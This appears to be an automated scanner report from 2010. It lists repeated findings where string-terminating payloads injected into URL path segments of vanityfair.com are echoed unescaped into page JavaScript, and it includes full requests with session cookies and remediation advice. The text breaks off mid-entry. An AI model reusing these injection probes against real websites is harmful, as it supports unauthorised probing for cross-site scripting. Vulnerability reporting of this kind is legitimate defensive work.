The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80e77'%3bad0e991cf0a was submitted in the REST URL parameter 5. This input was echoed as 80e77';ad0e991cf0a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/2010/10/irvin-kershner.html80e77'%3bad0e991cf0a HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:55 GMT Date: Mon, 29 Nov 2010 16:49:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/2010/10/irvin-kershner.html80e77';ad0e991cf0a', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3f6b'%3bdc25988505f was submitted in the REST URL parameter 3. This input was echoed as b3f6b';dc25988505f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/2010b3f6b'%3bdc25988505f/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:30 GMT Date: Mon, 29 Nov 2010 16:49:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/2010b3f6b';dc25988505f/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44661'%3be4d4dd436e2 was submitted in the REST URL parameter 4. This input was echoed as 44661';e4d4dd436e2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/2010/1144661'%3be4d4dd436e2/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:44 GMT Date: Mon, 29 Nov 2010 16:49:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/2010/1144661';e4d4dd436e2/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that dri ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12ee7'%3b32bded5e107 was submitted in the REST URL parameter 5. This input was echoed as 12ee7';32bded5e107 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html12ee7'%3b32bded5e107 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:00 GMT Date: Mon, 29 Nov 2010 16:50:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... t type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html12ee7';32bded5e107', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6172a'%3baefc0af122a was submitted in the REST URL parameter 3. This input was echoed as 6172a';aefc0af122a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/20106172a'%3baefc0af122a/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:23 GMT Date: Mon, 29 Nov 2010 16:49:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44705
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/20106172a';aefc0af122a/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ba74'%3bb4cd8dd4a4d was submitted in the REST URL parameter 4. This input was echoed as 8ba74';b4cd8dd4a4d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/2010/118ba74'%3bb4cd8dd4a4d/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:38 GMT Date: Mon, 29 Nov 2010 16:49:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44705
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/2010/118ba74';b4cd8dd4a4d/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fa ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 126e1'%3bac9d2566df4 was submitted in the REST URL parameter 5. This input was echoed as 126e1';ac9d2566df4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html126e1'%3bac9d2566df4 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:54 GMT Date: Mon, 29 Nov 2010 16:49:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44705
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... g.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html126e1';ac9d2566df4', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3617'%3b4a12938d0f3 was submitted in the REST URL parameter 3. This input was echoed as e3617';4a12938d0f3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/2010e3617'%3b4a12938d0f3/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:21 GMT Date: Mon, 29 Nov 2010 16:49:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44679
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/2010e3617';4a12938d0f3/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural cataly ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57b41'%3b2b03a642172 was submitted in the REST URL parameter 4. This input was echoed as 57b41';2b03a642172 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/2010/1157b41'%3b2b03a642172/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:37 GMT Date: Mon, 29 Nov 2010 16:49:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44679
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/2010/1157b41';2b03a642172/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e3cc'%3b41370df9c79 was submitted in the REST URL parameter 5. This input was echoed as 6e3cc';41370df9c79 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html6e3cc'%3b41370df9c79 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:49 GMT Date: Mon, 29 Nov 2010 16:49:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44679
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html6e3cc';41370df9c79', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfe08'%3b82759add385 was submitted in the REST URL parameter 3. This input was echoed as cfe08';82759add385 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/25-questionscfe08'%3b82759add385 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:34 GMT Date: Mon, 29 Nov 2010 16:49:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44616
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/25-questionscfe08';82759add385', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eab64'%3b1aceb5a8b7a was submitted in the REST URL parameter 3. This input was echoed as eab64';1aceb5a8b7a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
